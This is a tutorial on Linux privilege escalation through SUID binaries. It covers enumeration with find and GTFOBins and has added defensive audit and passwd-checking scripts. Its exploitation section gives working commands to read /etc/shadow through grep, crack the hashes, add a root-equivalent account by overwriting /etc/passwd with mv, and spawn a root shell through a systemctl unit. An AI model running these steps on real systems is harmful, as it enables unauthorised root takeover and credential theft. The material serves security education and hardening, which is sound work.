Linux Privilege Escalation – SUID Binaries
Introduction
Linux file permissions control whether a user or group can read, write or execute a given file.
SUID (set-user-ID) and SGID (set-group-ID) are two additional permission bits. When a binary with the SUID bit set is executed, the process runs with the effective user ID of the file's owner rather than that of the user who launched it; the SGID bit does the same for the file's group. (Some write-ups call the latter "GUID"; the correct name is SGID.) The Linux kernel honours these bits on ELF binaries only and ignores them on interpreted scripts.
Some binaries carry the SUID bit by default because they must perform a privileged action on behalf of an unprivileged user: passwd, for example, has to run as root to update /etc/shadow. A SUID-root binary that can be coaxed into reading or writing arbitrary files or executing arbitrary commands, however, hands that root privilege to any local user, which is what the rest of this article exploits.
Finding Existing SUID Binaries
Either of the following commands lists every regular file that has the SUID or SGID bit set:
find / -perm -u=s -type f 2>/dev/null
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
Both use the Linux find command, which locates files and directories, with the following arguments:
- / to start searching from the root directory
- -perm to match on permission bits: -u=s matches files with the setuid bit set (it says nothing about the owner), -4000 matches setuid, -2000 matches setgid, and -6000 would match only files with both bits, which is redundant once -4000 and -2000 are listed; the leading - means "at least these bits", so the ordinary read/write/execute bits do not interfere
- -o to OR the two -perm tests, with the grouping parentheses escaped so the shell passes them through to find
- -type f to restrict the match to regular files (on a directory the setgid bit only controls group inheritance and is not a privilege escalation concern)
- 2>/dev/null to discard the "Permission denied" errors from directories the current user cannot read
Automated enumeration tools such as LinPEAS list SUID and SGID files as part of their output.
To check a single binary, list it and look for an s in the owner execute position (SUID, e.g. -rwsr-xr-x) or in the group execute position (SGID, e.g. -rwxr-sr-x); a capital S means the bit is set but the matching execute bit is not:
ls -la path_to_binary
Identifying Vulnerable SUID Binaries
To find out whether any of these can be exploited, GTFOBins (https://gtfobins.github.io/) comes in handy.
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. Searching for a binary name shows every way that binary can be abused; the "SUID" section of the entry is the one this attack needs. Two caveats apply to almost every SUID entry: the commands are written as ./binary, i.e. against a SUID copy in the current directory, so substitute the real path when the system binary itself is SUID; and a shell spawned this way needs its privileged flag (the -p shown in the entry), because bash drops an effective UID that does not match the real UID unless told otherwise.
Automated enumeration tools such as LinPEAS also highlight SUID binaries that have a GTFOBins entry.
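As an added example that is not part of the original article, the following POSIX shell script combines the two steps above: it runs the same find query as the article and then flags every SUID/SGID file whose basename GTFOBins lists as exploitable when SUID. The watch list, the constructed sample input and the function names are the editor's own; the script assumes GNU findutils for -printf and -xdev, and its watch list contains only the binary names this article mentions rather than the full GTFOBins site.

```shell
#!/bin/sh
# Added audit helper, not from the original article. It runs the same find
# query as the article and flags every SUID/SGID file whose basename appears
# on a watch list of binaries that GTFOBins documents as exploitable when
# SUID. The watch list is constructed from the names this article mentions;
# extend it from https://gtfobins.github.io/ for real use.
# Assumes GNU findutils (-printf and -xdev).

GTFO_SUID_NAMES="bash cp find grep less more mv nano nmap systemctl vim"

# Emit "mode owner path" for every regular file under $1 (default /) with the
# setuid (4000) or setgid (2000) bit set. Errors from unreadable directories
# are discarded, exactly as in the article's command.
list_special_bits() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u %p\n' 2>/dev/null
}

# Read "mode owner path" lines on stdin (the format list_special_bits emits)
# and print "TAG mode owner path[ GTFOBINS]" for each file with a special bit.
# TAG is SUID, SGID or SUID+SGID. The special-bit digit is read straight from
# the mode string, so no octal arithmetic is needed and plain sh suffices.
flag_special_bits() {
    while IFS=' ' read -r mode owner path; do
        [ -n "$path" ] || continue
        case "$mode" in
            ????) special=${mode%???} ;;   # four digits: first is the special bits
            *)    continue ;;             # three digits: no special bits at all
        esac
        case "$special" in
            4|5) tag=SUID ;;              # 4000 (optionally + 1000 sticky)
            2|3) tag=SGID ;;              # 2000 (optionally + 1000 sticky)
            6|7) tag=SUID+SGID ;;         # 6000 (optionally + 1000 sticky)
            *)   continue ;;              # 1000 alone is just the sticky bit
        esac
        name=${path##*/}
        case " $GTFO_SUID_NAMES " in
            *" $name "*) printf '%s %s %s %s GTFOBINS\n' "$tag" "$mode" "$owner" "$path" ;;
            *)           printf '%s %s %s %s\n' "$tag" "$mode" "$owner" "$path" ;;
        esac
    done
}

# Constructed sample input in the list_special_bits format. It deliberately
# includes two lines find would never return (a plain 755 file and a
# sticky-only file) to show that they are skipped.
sample_special_bits() {
    cat <<'EOF'
4755 root /usr/bin/passwd
4755 root /usr/bin/find
755 root /usr/bin/ls
2755 root /usr/bin/wall
6755 root /opt/app/helper
1777 root /tmp/sticky-only
EOF
}

# Number of sample lines that get a GTFOBins flag (quick self-check).
count_gtfobins_hits() {
    sample_special_bits | flag_special_bits | grep -c 'GTFOBINS$'
}

# The live scan runs only when asked for, so sourcing this file has no side
# effects:   sh suid_audit.sh --scan
if [ "${1:-}" = "--scan" ]; then
    list_special_bits / | flag_special_bits
fi
```

On a real host, diff the --scan output against a baseline taken from a freshly installed image of the same distribution; anything new, anything carrying the GTFOBINS tag, and anything outside /usr/bin, /usr/sbin and /usr/lib deserves a look.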
Exploitation
Vulnerable SUID binaries can be used to read or write restricted files, copy files onto or off the host, execute commands as root, or obtain a shell with elevated privileges.
Several common Linux binaries, if left SUID root, give a root shell almost immediately:
- nmap
- find
- vim
- nano
- bash
- less / more
- cp
SUID root on any of the above almost always means full system compromise; GTFOBins documents the exact invocation for each. A few more examples follow:
Example #1 – Grep (File Read)
grep, a command-line utility that searches plain-text files with regular expressions, can be abused to read restricted files when it is SUID root: an empty pattern matches every line, so grep prints the whole file.
./grep '' file_to_read
Run against /etc/shadow, which holds the password hashes and is readable only by root, this prints every hash line to an unprivileged user.
Once extracted, the hashes can be cracked offline with John the Ripper or hashcat (Hydra is an online login brute-forcer and does not crack hash files). John expects the shadow lines combined with their /etc/passwd entries, which its unshadow helper produces:
john --wordlist=wordlist_file hashes_file
Example #2 – MV (File Write)
mv, a command-line utility that moves files and directories, replaces the destination when a file is moved onto an existing one. With the SUID bit set it does this as root, so any root-owned file can be overwritten, including /etc/passwd.
The attack appends a line with UID 0 to a copy of /etc/passwd and moves the copy back into place, which adds a second root-equivalent account whose password the attacker chose. Copying the original first keeps every existing entry intact, so normal logins keep working and the change is less conspicuous.
Generate a password hash in a format /etc/passwd accepts (MD5-crypt here, for the password "password"):
openssl passwd -1 -salt salt password
Copy /etc/passwd to /tmp and append an entry for a new "stefhacked" user with UID and GID 0, pasting the generated hash into the second field. Use single quotes so the shell does not expand the $1$salt$... parts of the hash as variables (inside double quotes each $ would have to be escaped as \$):
cd /tmp
cp /etc/passwd /tmp/passwd
echo 'stefhacked:hash:0:0:Ubuntu,,,:/home/stef:/bin/bash' >> passwd
Replace /etc/passwd with the modified copy (this assumes the system mv is SUID root; GTFOBins writes it as ./mv against a SUID copy) and switch to the new user with the password chosen above:
mv passwd /etc/passwd
su stefhacked
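As an added example (not from the original article), the following POSIX shell functions implement the check a defender would run for exactly this technique: they read any passwd-format file and report extra UID 0 accounts and password fields that hold a hash instead of the x that points to /etc/shadow. The sample passwd content is constructed and the function names are the editor's own; the only external tool used is awk.

```shell
#!/bin/sh
# Added detection helper, not from the original article. The mv/passwd
# technique above leaves two tell-tale signs in /etc/passwd: an extra account
# with UID 0, and a password hash stored directly in the second field instead
# of the "x" that defers to /etc/shadow. These functions look for both in any
# passwd-format file, so they work on a live /etc/passwd or on a copy pulled
# from a suspect host.

# Print the name of every account with UID 0 other than "root".
# Fields: name:password:uid:gid:gecos:home:shell
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print "name:field" for every account whose password field is neither "x"
# (hash lives in /etc/shadow) nor a lock marker ("*", "!" or "!!"), i.e. a
# hash or an empty password sitting in the world-readable passwd file.
inline_password_fields() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" { print $1 ":" $2 }' "$1"
}

# Combined verdict: prints one line per finding and returns 1 if anything was
# found, so it can gate a cron job or a golden-image check.
check_passwd_file() {
    found=0
    for u in $(extra_uid0_accounts "$1"); do
        echo "extra UID 0 account: $u"
        found=1
    done
    for f in $(inline_password_fields "$1"); do
        echo "password field not in shadow: $f"
        found=1
    done
    return $found
}

# Constructed sample: a normal passwd file plus the entry the article's
# example appends (hash shortened; a real one is a full MD5-crypt string).
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
stef:x:1000:1000:Stef,,,:/home/stef:/bin/bash
stefhacked:$1$salt$abc123:0:0:Ubuntu,,,:/home/stef:/bin/bash
EOF
}

# Run against a real file only when asked for:
#   sh passwd_check.sh --check /etc/passwd
if [ "${1:-}" = "--check" ]; then
    check_passwd_file "${2:-/etc/passwd}"
fi
```

Run on a schedule and alert on a non-zero exit; on a correctly configured host both functions print nothing, because every password field is x and only root has UID 0.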
Example #3 – SystemCTL (Root Shell)
systemctl, the command-line front end to the systemd service manager, can be abused when SUID root by registering a unit file whose ExecStart runs an arbitrary command as root when the service starts. The unit below copies /bin/bash to /tmp/stef and sets the SUID bit on the copy; running that copy with -p then gives a root shell (-p stops bash from dropping the effective UID back to the caller's). The systemctl invocations assume the system binary is SUID root (GTFOBins writes them as ./systemctl against a SUID copy). One caveat: if /tmp is mounted nosuid, the kernel ignores the SUID bit on /tmp/stef and the shell comes up unprivileged, so point the copy at a filesystem without that option.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /tmp/stef && chmod +s /tmp/stef"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
/tmp/stef -p
Conclusion
SUID is a necessary part of every Linux system and a convenient way for administrators to let regular users run one specific privileged program, but it is also one of the most common local privilege escalation vectors.
The SUID bit should never be set on a general-purpose binary that can run other programs, read or write arbitrary files, or register services. Keep it on the small set of purpose-built binaries that need it, re-run the find command above periodically (or diff its output against a known-good baseline), and remove the bit from anything unexpected with chmod u-s. Where a user needs only one privileged operation, a narrowly scoped sudo rule is a far safer grant than a SUID-root copy of a general-purpose tool.